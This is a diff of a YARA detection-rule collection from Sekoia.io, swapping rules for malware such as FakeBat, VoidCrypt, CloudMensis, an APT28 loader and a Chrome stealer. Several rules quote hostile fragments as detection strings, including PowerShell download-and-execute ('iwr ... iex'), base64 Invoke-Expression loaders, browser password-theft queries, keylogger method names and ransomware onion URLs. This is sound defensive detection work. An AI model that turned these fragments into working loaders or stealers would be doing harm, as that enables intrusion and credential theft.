-		$ = "/Users/ghost/Desktop/EdoneViewer/EdoneViewer/"
-		$ = "EdoneViewerApp.swift"
+		$ = "[.] SMEP & SMAP bypass enabled, turning them off"
+		$ = "[.] done, SMEP & SMAP should be off now"
+		$ = "[.] executing get root payload %p"
+		$ = "[.] done, should be root now"
 
 	condition:
-		1 of them
+		uint32be( 0 ) == 0x7f454c46 and filesize < 1MB and all of them
 }
-rule SEKOIA_Apt_Sidecopy_Malicious_Macro : FILE
+rule SEKOIA_Apt_Cloudatlas_Powershower_Module : FILE
 {
 	meta:
-		description = "Detects malicious macro used by SideCopy"
+		description = "Detects CloudAtlas PowerShower module"
 		author = "Sekoia.io"
-		id = "4b90c33e-48d4-48b6-87a7-c35686e7e913"
-		date = "2023-05-11"
+		id = "dd688058-3d5d-46a7-8380-fe961c3327cd"
+		date = "2022-11-30"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_sidecopy_malicious_macro.yar#L1-L21"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_cloudatlas_powershower_module.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "b1d9d7af8507b478b2a8d34a4a5ca3714b219a42d5b3f9d5026d98351294e1cf"
+		logic_hash = "7542eb882ee44203d806ad936126be2476b6e3a85ad8c93b6fd6c8226fe82617"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -240179,94 +240041,80 @@ rule SEKOIA_Apt_Sidecopy_Malicious_Macro : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "htmlFile$"
-		$ = "Gecko/20100101 Firefox/91.0"
-		$ = "Start Menu\\Programs\\Startup\\"
-		$ = "Document_Close"
-		$ = "ThisDocument" wide
-		$ = "ServerXMLHTTP.6.0"
+		$ = "$env:temp" ascii wide
+		$ = "foreach($item in $zip.items" ascii wide
+		$ = "echo $result" ascii wide
+		$ = "pass.txt" ascii wide
 
 	condition:
-		uint32be( 0 ) == 0xD0CF11E0 and all of them
+		all of them and filesize < 10000
 }
-rule SEKOIA_Downloader_Mac_Rustbucket : FILE
+rule SEKOIA_Apt_Kimsuky_Sharpext_Devtoolmodule_Strings : FILE
 {
 	meta:
-		description = "RustBucket fake PDF reader"
+		description = "Detects the DevTool module used by SharpExt"
 		author = "Sekoia.io"
-		id = "5a003b68-ad9a-47f9-b157-dd898181dac2"
-		date = "2023-04-24"
+		id = "6f589a9c-344a-4ddc-929e-f123a2c3c187"
+		date = "2022-07-29"
 		modified = "2024-12-19"
-		reference = "https://www.jamf.com/blog/bluenoroff-apt-targets-macos-rustbucket-malware/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/downloader_mac_rustbucket.yar#L1-L31"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_kimsuky_sharpext_devtoolmodule_strings.yar#L1-L17"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "1b9e9a3f4fb4804eb94ab8d3573781d67f96d180b258cfc10be384eec44509ed"
+		logic_hash = "61007801d28636c6d88b14225f34910d03e82337520257637a5017d58600b2bc"
 		score = 75
-		quality = 78
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "38106b043ede31a66596299f17254d3f23cbe1f983674bf9ead5006e0f0bf880"
-		hash2 = "bea33fb3205319868784c028418411ee796d6ee3dfe9309f143e7e8106116a49"
-		hash3 = "7981ebf35b5eff8be2f3849c8f3085b9cec10d9759ff4d3afd46990520de0407"
-		hash4 = "e74e8cdf887ae2de25590c55cb52dad66f0135ad4a1df224155f772554ea970c"
 
 	strings:
-		$down_exec1 = "_down_update_run" nocase
-		$down_exec2 = "downAndExec" nocase
-		$encrypt1 = "_encrypt_pdf"
-		$encrypt2 = "_encrypt_data"
-		$error_msg1 = "_alertErr"
-		$error_msg2 = "_show_error_msg"
-		$view_pdf1 = "-[PEPWindow view_pdf:]"
-		$view_pdf2 = "-[PEPWindow viewPDF:]"
-		$macho_magic = {CF FA ED FE}
-		$java_magic = {CA FE BA BE}
+		$ = "packetProc = function" ascii fullword
+		$ = "var url = request.request.url" ascii fullword
+		$ = "https://mail" ascii fullword
 
 	condition:
-		($macho_magic at 0 or $java_magic at 0 ) and 5 of them and filesize > 50KB
+		all of them and filesize < 50KB
 }
-rule SEKOIA_Tool_Win_Driverjack : FILE
+rule SEKOIA_Loader_Fakebat_Initial_Powershell_May24 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - SEKOIA"
+		description = "Finds FakeBat initial PowerShell script downloading and executing the next-stage payload."
 		author = "Sekoia.io"
-		id = "08bc0fe8-38f1-4c73-99c8-2659b4a55815"
-		date = "2024-09-11"
+		id = "adf0e4fc-fa98-470b-9535-bd30d0bdb3aa"
+		date = "2024-05-28"
 		modified = "2024-12-19"
-		reference = "https://github.com/klezVirus/DriverJack/blob/master/DriverJack"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_win_driverjack.yar#L1-L20"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/loader_fakebat_initial_powershell_may24.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "649fc12915bdcdebbc3798a8ad0b9b32"
-		logic_hash = "0ea81c32b75ff66434f0c949be7d1478ce9268eb1b67dc5b7d6c7604cedcd72c"
+		logic_hash = "6a699df361b0cb2baf1d0b128f795aa9918ebe11daaeb1fa49aebf9320add762"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
+		modification_date = "2024-06-21"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "(*) Decrypting %llu bytes of file content using key '%s' of length %u..."
-		$ = "(*) Modifying file %s in mapped drive..."
-		$ = "(*) Checking file %s in mapped drive..."
-		$ = "(-) CreateProcess failed '%s' (%08x)."
-		$ = "(*) Mounted Drive Letter: %s"
+		$str01 = "='http" wide
+		$str02 = "=(iwr -Uri $" wide
+		$str03 = " -UserAgent $" wide
+		$str04 = " -UseBasicParsing).Content; iex $" wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and all of them
+		3 of ( $str* ) and filesize < 1KB and true
 }
-rule SEKOIA_Apt_Cloudmensis_Spyagent_Strings : FILE
+rule SEKOIA_Ransomware_Win_Voidcrypt : FILE
 {
 	meta:
-		description = "Detects CloudMensis SpyAgent"
+		description = "Detect the Limbozar / VoidCrypt ransomware"
 		author = "Sekoia.io"
-		id = "c2df8373-6698-4b23-9d77-8e7968bd69f0"
-		date = "2022-07-26"
+		id = "394033cc-20fe-4ced-8d77-5f1061bb8c96"
+		date = "2021-10-07"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_cloudmensis_spyagent_strings.yar#L1-L21"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/ransomware_win_voidcrypt.yar#L1-L17"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "ad858b1b78fb4ac6efee093b11fde14956d63bc6b300ef37bf1f2a3356cf4402"
+		logic_hash = "7e28bae5830df779bf2367482fb966f5cab691a6c8c474950f7442d8fec054a0"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -240274,110 +240122,113 @@ rule SEKOIA_Apt_Cloudmensis_Spyagent_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "[control_thread loop_DirStructure:]"
-		$ = "[screen_keylog getScreenShotData]"
-		$ = "[screen_keylog loop_usb]"
-		$ = "[Management UploadFilebyPath:destination:]"
-		$ = "[control_thread loop_pwd:]"
+		$s1 = "C:\\ProgramData\\pkey.txt" ascii
+		$s2 = "C:\\ProgramData\\IDk.txt" ascii
+		$s3 = "fuckyoufuckyoufuckyoufuckyou" ascii
 
 	condition:
-		uint32be( 0 ) == 0xcafebabe and filesize < 2MB and all of them
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule SEKOIA_Apt_Apt41_Powershell_Collection_Script : FILE
+rule SEKOIA_Ransomware_Win_Masons_Jan2023 : FILE
 {
 	meta:
-		description = "Detects PowerShell collection script"
+		description = "Rule to detect Masons ransomware samples."
 		author = "Sekoia.io"
-		id = "55b6cc3e-24b2-4faa-a7fb-b4203a8e6d83"
-		date = "2023-11-15"
+		id = "cf2af08b-b4a8-4245-9308-242e15aeb346"
+		date = "2023-02-13"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_apt41_powershell_collection_script.yar#L1-L19"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/ransomware_win_masons_jan2023.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "8b0462636c9f6270baff2bf09638e94db6d5a0472b8216ddd1919a77b6a63aca"
+		logic_hash = "05badf0364c6f61cd081a3ae64bc92b48e6f59c026a5d6b5b68acd5a8987cf91"
 		score = 75
-		quality = 70
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "7826978642c568f975e2b65d1575fdf92e634f7c80db2c86c9d7c8066e8955b8"
 
 	strings:
-		$ = "$yestoday.ToString(" ascii wide nocase
-		$ = "$m.LastAccessTime -" ascii wide nocase
-		$ = "$fmat=" ascii wide nocase
-		$ = "$computername" ascii wide nocase
-		$ = "Rar.exe" ascii wide nocase
+		$s1 = "Masons" wide
+		$s2 = "@mineralIaha/@root_king1" wide
+		$s3 = "Glory @six62ix" wide
 
 	condition:
-		filesize < 10KB and all of them
+		uint16be( 0 ) == 0x4d5a and all of them
 }
-rule SEKOIA_Apt_Aptc36_Vbs_Maldoc : FILE
+rule SEKOIA_Apt_Susp_Apt28_Uac0063_Malicious_Doc_Settings_Xml : FILE
 {
 	meta:
-		description = "Find VBS file used by the threat actor APT-C-36"
+		description = "Detects some suspected APT28 document settings.xml"
 		author = "Sekoia.io"
-		id = "f0ca061f-e94b-4f70-bbd1-8a15193652d3"
-		date = "2022-02-16"
+		id = "fd104985-6441-4fb6-8cc1-30afa4a7797b"
+		date = "2024-07-25"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_aptc36_vbs_maldoc.yar#L1-L23"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_susp_apt28_uac0063_malicious_doc_settings_xml.yar#L1-L19"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "cf448731378e97d740d42aa19d1bb81330c3998f07e94ce57bd8d82fc39c6428"
-		score = 75
-		quality = 51
+		hash = "0272acc6ed17c72320e4e7b0f5d449841d0ccab4ea89f48fd69d0a292cc5d39a"
+		logic_hash = "29b40a83340e71bfc38dc7050b3a21e62e2d2e506dbd077c1c7e430c8ff56d32"
+		score = 65
+		quality = 30
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$dim = "dim " wide ascii
-		$hea = "::::::::::::::::::::::::::::::::::::::::::::::::" wide ascii
-		$str0 = "update" wide ascii nocase
-		$str1 = "On Error Resume Next" wide ascii
-		$str2 = "CreateObject" wide ascii
-		$str3 = "WScript" wide ascii
+		$ = "http://schemas.openxmlformats.org/" ascii fullword
+		$ = "Call svc.GetFolder(" ascii fullword
+		$ = "CreateTextFile(appdir" ascii fullword
+		$ = "Sub Document_Open() : On Error Resume Next" ascii fullword
 
 	condition:
-		#dim> 5 and #hea > 10 and 2 of ( $str* ) and filesize > 10KB and filesize < 1MB
+		2 of them and filesize < 1MB
 }
-rule SEKOIA_Apt_Kimsuky_Sharpext_Devps1_Strings : FILE
+rule SEKOIA_Apt_Malware_Pocoproxy : FILE
 {
 	meta:
-		description = "Detects strings of Dev.ps1"
+		description = "Detects strings in PocoProxy"
 		author = "Sekoia.io"
-		id = "f2ad32a4-bfca-40b2-964e-b8562538a6f2"
-		date = "2022-07-29"
+		id = "8b37e37f-339e-4f8b-b792-435096f56af0"
+		date = "2024-08-13"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_kimsuky_sharpext_devps1_strings.yar#L1-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_malware_pocoproxy.yar#L1-L25"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "32e96440838bf63679b2a05ce4e6c226bed515ceb5180e3cf079206e21a0c0c5"
+		hash = "2b89f15012512002c656ff821bbbeca0"
+		hash = "8d850fed6bb1f3b60365ed656c6791c5"
+		logic_hash = "217f4eabb5ff4534878b6dd192ae446e651d8510f03ceb501eb33e91199c15a8"
 		score = 75
-		quality = 55
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "keybd_Event(" ascii fullword
-		$s2 = "Sleep" ascii fullword
-		$s3 = "CreateDev" ascii fullword
+		$ = "-listen" ascii fullword
+		$ = "-connect" ascii fullword
+		$ = "-proxy" ascii fullword
+		$ = "%d-%d-%d %d:%d:%d" ascii fullword
+		$ = "%S://%S:%u%S" wide
+		$ = "\\r\\n[%u(%u/%u/%u/%u)]==> %S  %S>> %S:%d connect ok." wide
+		$ = "\\r\\nnconnect to %S:%d faild." wide
+		$ = "\\r\\nI'm listen %S:%d,welcome..." wide
 
 	condition:
-		filesize < 10KB and #s1 == 6 and #s2 == 6 and $s3
+		uint16be( 0 ) == 0x4d5a and 5 of them
 }
-rule SEKOIA_Implant_Lin_Lightning : FILE
+rule SEKOIA_Tool_Exploit_Rottenpotato_Strings : FILE
 {
 	meta:
-		description = "Detect the Lightning framework (Core & Downloader plugin)"
+		description = "Detects RottenPotato compiled binaries"
 		author = "Sekoia.io"
-		id = "56f53e89-3b63-4ce7-a3c8-da0ba37246f1"
-		date = "2022-07-21"
+		id = "453646d4-b128-40ea-8840-4c53b8f1e486"
+		date = "2022-09-09"
 		modified = "2024-12-19"
-		reference = "https://www.intezer.com/blog/research/lightning-framework-new-linux-threat/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/implant_lin_lightning.yar#L1-L27"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_exploit_rottenpotato_strings.yar#L1-L27"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "215eea8275fa69a901f6413b334d2824086098e9a9bb2cffd7cb9df5c869be4c"
+		logic_hash = "c634fcced6889caf895ddf57bab5564fb2b0a4c83f1d6ba4dae655f2e5d935db"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -240385,34 +240236,33 @@ rule SEKOIA_Implant_Lin_Lightning : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "{\"ComputerName\":\"%s\",\"Guid\":\"%s\",\"RequestName\":\"%s\",\"Licence\":\"%s\"}"
-		$ = "kill -9 %s"
-		$ = "{%08X-%04X-%04X-%04X-%04X%04X%04X}"
-		$ = "sleep 60 && ./%s &"
-		$ = "cat /sys/class/net/%s/address"
-		$ = "/usr/bin/netstat"
-		$ = "/usr/bin/whoami"
-		$ = "/usr/bin/su"
-		$ = "dup2: %s"
-		$ = "Linux.Plugin.Kernel_%s"
-		$ = "Lightning"
+		$ = "WSAStartup failed with error: %d"
+		$ = "getaddrinfo failed with error: %d"
+		$ = "RPC -> send failed with error: %d"
+		$ = "RPC-> Connection closed"
+		$ = "COM -> bytes sent: %d"
+		$ = "COM -> recv failed with error: %d"
+		$ = "Running %S with args %S"
+		$ = "[-] Failed to create proc: %d"
+		$ = "Waiting for auth..."
+		$ = "Auth result: %d"
+		$ = "SeImpersonatePrivilege" wide
 
 	condition:
-		uint32( 0 ) == 0x464c457f and 9 of them
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 8 of them
 }
-
-rule SEKOIA_Infostealer_Win_Irontiger_Chrome_Stealer : FILE
+rule SEKOIA_Apt_Muddywater_Manifestation_Backdoor_Obfuscated : FILE
 {
 	meta:
-		description = "Detect the chrome_stealer malware"
+		description = "Detects obfuscated Muddys manifestation JScript backdoor"
 		author = "Sekoia.io"
-		id = "8c5c3ed0-e1ea-4079-b330-ace8724bff2a"
-		date = "2023-03-01"
+		id = "58df72a1-822c-4b82-904d-1c0124dc7bc1"
+		date = "2022-01-13"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_irontiger_chrome_stealer.yar#L3-L32"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_muddywater_manifestation_backdoor_obfuscated.yar#L1-L17"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "dfddebf9623661508e993541106d4dcbb2270b311b2902567bd309810aff58dd"
+		logic_hash = "8610f0895fafd2bc9a19bbff816754b563565ba6b105cc3d0a32b80bf5ebdc47"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -240420,99 +240270,81 @@ rule SEKOIA_Infostealer_Win_Irontiger_Chrome_Stealer : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "passwords.txt"
-		$ = "CryptUnprotectData: 0x%08x"
-		$ = "cookies.txt"
-		$ = "decrypt to %s"
-		$ = ".\\chromedb_tmp" wide ascii
-		$ = "SELECT ORIGIN_URL,USERNAME_VALUE,PASSWORD_VALUE FROM LOGINS;"
-		$ = "decrypt successful!"
-		$ = "url: %s"
-		$ = "user: %s"
-		$ = "pass: %s"
-		$ = "aes key:"
-		$ = "\\Google\\Chrome\\User Data\\Default\\Login Data" wide
-		$ = "password file %s" wide
-		$ = "cookies file %s" wide
-		$ = "keyfile: %s" wide
+		$m = { 76 61 72 20 5f 30 78 [4-6] 3d 5b }
+		$w = {57 53 63 72 69 70 74 5b 5f 30 78 [4-6] 28 30 78 [2-3] 29 5d 28 30 78 [2-3] 2a 30 78 [2-3] 29 2c }
+		$t = "subkeys(key));}"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and all of them ) or pe.imphash ( ) == "e862f5a6671f9dbd6f53d3d557e568f0"
+		$m at 0 and ( $t at ( filesize -16 ) or $w in ( filesize -200 .. filesize ) )
 }
-rule SEKOIA_Apt_Polonium_Powershell_Creepydrive_Strings
+rule SEKOIA_Tool_Nping_Strings : FILE
 {
 	meta:
-		description = "Detects POLONIUM CreepyDrive Powershell implant"
+		description = "Detects NPing"
 		author = "Sekoia.io"
-		id = "0ba196bd-9cd6-4553-b7bf-69989cdb8be4"
-		date = "2022-06-03"
+		id = "fcfd9539-b224-45b4-9252-0b4d56a40be4"
+		date = "2022-08-11"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_polonium_powershell_creepydrive_strings.yar#L1-L24"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_nping_strings.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "28b8f10a36d13e97e606b082f20c50c3d48241409e7f1aca621e2af9d756dbe5"
+		logic_hash = "0c7216438e9c974d889e4ccc8cdb99ab18d1dc403820d60914b80ff9bc4528fa"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "function Exec($comm)" base64 ascii wide
-		$ = "$comm = $comm + \"| outstring" base64 ascii wide
-		$ = "Invoke-Expression -Command:$comm" base64 ascii wide
-		$ = "microsoft.com" base64 ascii wide
-		$ = "$req = Invoke-WebRequest" base64 ascii wide
-		$ = "$j += $data" base64 ascii wide
-		$ = "$res = Exec($arr[$i])" base64 ascii wide
-		$ = "$arr = @(iex \"$req\")" base64 ascii wide
-		$ = "elseif ($req -cmatch" base64 ascii wide
-		$ = "graph.microsoft.com" base64 ascii wide
+		$ = "http://nmap.org/nping"
+		$ = "nping scanme.nmap.org"
+		$ = "Bogus target structure passed to %s"
+		$ = "Packet too short."
+		$ = "read_arp_reply_pcap"
 
 	condition:
-		3 of them
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and 3 of them and filesize < 1MB
 }
-rule SEKOIA_Ransomware_Lin_Avoslocker_Strings : FILE
+rule SEKOIA_Apt_Lazarus_Dangerouspassword_Lnk : FILE
 {
 	meta:
-		description = "Detect AvosLocker ransomware for Linux by using strings from its ransom note and the onion domains"
+		description = "Detects Lazarus DangerousPassword LNKs"
 		author = "Sekoia.io"
-		id = "6056e15c-d656-41cb-bea0-704776c52c92"
-		date = "2022-02-21"
+		id = "32533880-7f75-4682-a7ae-9868d0b5174b"
+		date = "2022-07-26"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/ransomware_lin_avoslocker_strings.yar#L1-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_lazarus_dangerouspassword_lnk.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "b65cf6713027644de281f17a4c5c170fc09a154e7119d04a92aceed0e2d7e4fd"
+		logic_hash = "79731450c4623f614c55d8c08d879579e21fd38c85d2a288724b6e9470de6e29"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "0cd7b6ea8857ce827180342a1c955e79c3336a6cf2000244e5cfd4279c5fc1b6"
-		hash2 = "7c935dcd672c4854495f41008120288e8e1c144089f1f06a23bd0a0f52a544b1"
-		hash3 = "10ab76cd6d6b50d26fde5fe54e8d80fceeb744de8dbafddff470939fac6a98c4"
 
 	strings:
-		$s1 = "The corporations whom don't pay or fail to respond in a swift manner can be found in our blog, accessible at" ascii
-		$s2 = "http://avosqxh72b5ia23dl5fgwcpndkctuzqvh2iefk5imp3pi5gfhel5klad.onion" ascii
-		$s3 = "http://avosjon4pfh3y7ew3jdwz6ofw7lljcxlbk7hcxxmnxlh5kvf2akcqjad.onion" ascii
+		$s1 = {6D 00 73 00 68 00 2A}
+		$s2 = {25 00 70 00 75 00 62 00 6C 00 69 00 63 00 25}
+		$s3 = {44 00 4F 00 20 00 73 00 74 00 61 00 72 00 74}
+		$b1 = {2F 00 63 00 20 00 73 00 74 00 61 00 72 00 74 00 20 00 2F 00 62 00 20 00 6D 00 73 00 68 00 74 00 61}
+		$c1 = {68 00 74 00 74 00 70 00 73 00 3A 00 2F 00 2F 00 62 00 69 00 74 00 2E 00 6C 00 79 00 2F}
 
 	condition:
-		uint32( 0 ) == 0x464c457f and all of them
+		uint32be( 0 ) == 0x4C000000 and filesize > 1KB and filesize < 40MB and ( all of ( $s* ) or $b1 or ( $s1 and $c1 ) )
 }
-rule SEKOIA_Apt_Badmagic_Listfiles_Pshscript : FILE
+rule SEKOIA_Apt_Unc4990_Explorer_Ps1_Reverse_B64 : FILE
 {
 	meta:
-		description = "Detects BadMagic ListFiles powershell script"
+		description = "Detects reverse base64 files (explorer.ps1)"
 		author = "Sekoia.io"
-		id = "55f1c409-234e-4feb-91a3-9bf5c41ec2b8"
-		date = "2023-05-15"
+		id = "35c3ffb2-2ced-426c-ac3f-a8cd0c357672"
+		date = "2024-02-01"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_badmagic_listfiles_pshscript.yar#L1-L16"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_unc4990_explorer_ps1_reverse_b64.yar#L1-L17"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "4401d31e4b0484776aab51c161a301fc4ee3e944a1669df763bd274014178368"
+		logic_hash = "bf13fbf2dbe6a718510f3e435a9fe06517ed962f8e129d79a15e6a301e5713ca"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -240520,24 +240352,25 @@ rule SEKOIA_Apt_Badmagic_Listfiles_Pshscript : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "$env:USERPROFILE"
-		$ = "-Include *.jpg, *.odt, *.doc, *.docx"
+		$s0 = "Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(\""
+		$s1 = "Wa1VHJ\"[-1..-"
+		$s2 = "-join '')))"
 
 	condition:
-		all of them and filesize < 1KB
+		all of them and $s0 at 0 and @s2 - @s2 < 20
 }
-rule SEKOIA_Shell_Win_Danfuan : FILE
+rule SEKOIA_Apt_Badmagic_Commonmagic_Generic_1 : FILE
 {
 	meta:
-		description = "Detect the Danfuan malware"
+		description = "Detects CommonMagic related implants"
 		author = "Sekoia.io"
-		id = "d1cf9988-270b-4a22-bdd5-f40b625715a8"
-		date = "2022-11-04"
+		id = "0b328771-f674-4606-bb30-d20d07c67832"
+		date = "2023-05-15"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/shell_win_danfuan.yar#L1-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_badmagic_commonmagic_generic_1.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "96929ef478a8773022233a4092b3c157867aae6ee185568a6327d033c05a68f1"
+		logic_hash = "513226d050945af1a8bbc51f9a48936c815bfc6cd43b0766e34ac000d3c90625"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -240545,107 +240378,92 @@ rule SEKOIA_Shell_Win_Danfuan : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "<%@ WebHandler Language=\"C#\" class=\"DynamicCodeCompiler\"%>"
-		$ = "CompilerResults compilerResults = compiler.CompileAssemblyFromSource(comPara, SourceText(txt))"
-		$ = "MethodInfo objMifo = objInstance.GetType().GetMethod("
+		$ = "\\CommonCommand\\Clean\\"
+		$ = "\\CommonCommand\\Overall\\"
+		$ = "\\CommonCommand\\Other\\"
+		$ = "\\CommonCommand\\Other\\*"
 
 	condition:
-		filesize < 15KB and all of them
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and all of them
 }
-rule SEKOIA_Apt_Susp_Apt28_Uac0063_Hatvibe
+rule SEKOIA_Ransomware_Win_Dodo_2023 : FILE
 {
 	meta:
-		description = "Detects some suspected UAC-0063/APT28 HTA loader"
+		description = "Rule to detect Dodo ransomware samples."
 		author = "Sekoia.io"
-		id = "c4e04671-e75f-40a4-a489-79c2ce91cf7a"
-		date = "2024-07-25"
+		id = "190977d4-5a7a-4e15-8f90-085f82ec56c8"
+		date = "2023-02-13"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_susp_apt28_uac0063_hatvibe.yar#L1-L20"
